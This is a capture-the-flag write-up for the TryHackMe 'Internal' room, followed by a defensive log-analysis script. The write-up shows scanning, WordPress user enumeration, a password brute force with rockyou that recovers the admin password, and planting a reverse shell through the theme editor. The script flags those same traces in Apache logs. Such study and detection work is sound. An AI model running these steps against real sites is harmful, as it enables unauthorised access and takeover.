https://tryhackme.com/room/internal

Pwned Date - 6th August 2022

Enumeration

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


┌──(kali㉿kali)-[~]
└─$ gobuster dir -u http://10.10.59.132/ -w /usr/share/wordlists/dirb/common.txt -q -t 200
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/.htpasswd            (Status: 403) [Size: 277]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.59.132/blog/]
/index.html           (Status: 200) [Size: 10918]
/javascript           (Status: 301) [Size: 317] [--> http://10.10.59.132/javascript/]
/phpmyadmin           (Status: 301) [Size: 317] [--> http://10.10.59.132/phpmyadmin/]
/server-status        (Status: 403) [Size: 277]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.59.132/wordpress/]

Both /blog and /wordpress are listed, but /wordpress is not found. Hence we will target /blog and run wpscan against it.

┌──(kali㉿kali)-[~]
└─$ wpscan --url 10.10.59.132/blog --enumerate u

......

[i] User(s) Identified:

[+] admin
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

Exploitation

We found the username admin; let's brute force it.

┌──(kali㉿kali)-[~]
└─$ wpscan --url 10.10.59.132/blog -U admin -P /usr/share/wordlists/rockyou.txt

......

[!] Valid Combinations Found:
 | Username: admin, Password: my2boys

When we click the Log In tab, we are redirected to internal.thm


Let’s add it to /etc/hosts

10.10.59.132 internal.thm

Then we can visit the login portal and log in with the credentials admin:my2boys

After logging in, we can go to Appearance > Theme Editor to add our reverse shell

http://internal.thm/blog/wp-admin/theme-editor.php?file=404.php&theme=twentyseventeen


Finally, we set up our reverse shell listener and then visit the following URL

http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
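As an added defensive example (not part of the room or this writeup), the Python script below walks Apache access-log lines and flags the traffic pattern the steps above leave behind on the web server: author-ID enumeration via ?author=N, a burst of POSTs to wp-login.php, and a direct request for a theme template file under wp-content/themes. The log lines, IP addresses, User-Agent strings and thresholds are constructed for the sample.

```python
import re
from collections import Counter, defaultdict

# Apache "combined" log format, as produced by the Apache 2.4 seen on the target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

def make_line(ip, method, path, status, ua="Mozilla/5.0"):
    """Build one constructed access-log line (sample data, not from the room)."""
    return (f'{ip} - - [06/Aug/2022:10:00:00 +0000] "{method} {path} HTTP/1.1" '
            f'{status} 512 "-" "{ua}"')

# Constructed sample: one host enumerates author IDs, hammers wp-login.php and then
# requests a theme template directly; a second host is an ordinary visitor.
SAMPLE_LOG = "\n".join(
    [make_line("10.0.0.5", "GET", f"/blog/?author={i}", 301 if i == 1 else 404, "WPScan v3.8")
     for i in range(1, 7)]
    + [make_line("10.0.0.5", "POST", "/blog/wp-login.php", 200, "WPScan v3.8") for _ in range(12)]
    + [make_line("10.0.0.5", "GET", "/blog/wp-content/themes/twentyseventeen/404.php", 200)]
    + [make_line("10.0.0.9", "GET", "/blog/", 200),
       make_line("10.0.0.9", "POST", "/blog/wp-login.php", 302)]
)

def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def wp_findings(log_text, enum_min=5, login_min=10):
    """Return {ip: [indicator, ...]} for hosts whose counts exceed the thresholds."""
    counts = defaultdict(Counter)
    for r in parse(log_text):
        path, query = (r["path"].split("?", 1) + [""])[:2]
        if r["method"] == "GET" and re.search(r"(^|&)author=\d+", query):
            counts[r["ip"]]["author_enum"] += 1          # ?author=N probing
        if r["method"] == "POST" and path.endswith("/wp-login.php"):
            counts[r["ip"]]["login_posts"] += 1          # password guessing
        if re.search(r"/wp-content/themes/[^/]+/.*\.php$", path):
            counts[r["ip"]]["direct_theme_php"] += 1     # template hit directly
    findings = {}
    for ip, c in counts.items():
        hits = []
        if c["author_enum"] >= enum_min: hits.append("author enumeration")
        if c["login_posts"] >= login_min: hits.append("wp-login brute force")
        if c["direct_theme_php"]: hits.append("direct theme template request")
        if hits: findings[ip] = hits
    return findings

if __name__ == "__main__":
    for ip, hits in wp_findings(SAMPLE_LOG).items():
        print(ip, "->", ", ".join(hits))
```

A single POST to wp-login.php stays below the threshold, so the ordinary visitor is not reported; the direct template request is flagged on its first occurrence because WordPress normally includes theme files rather than serving them on direct request.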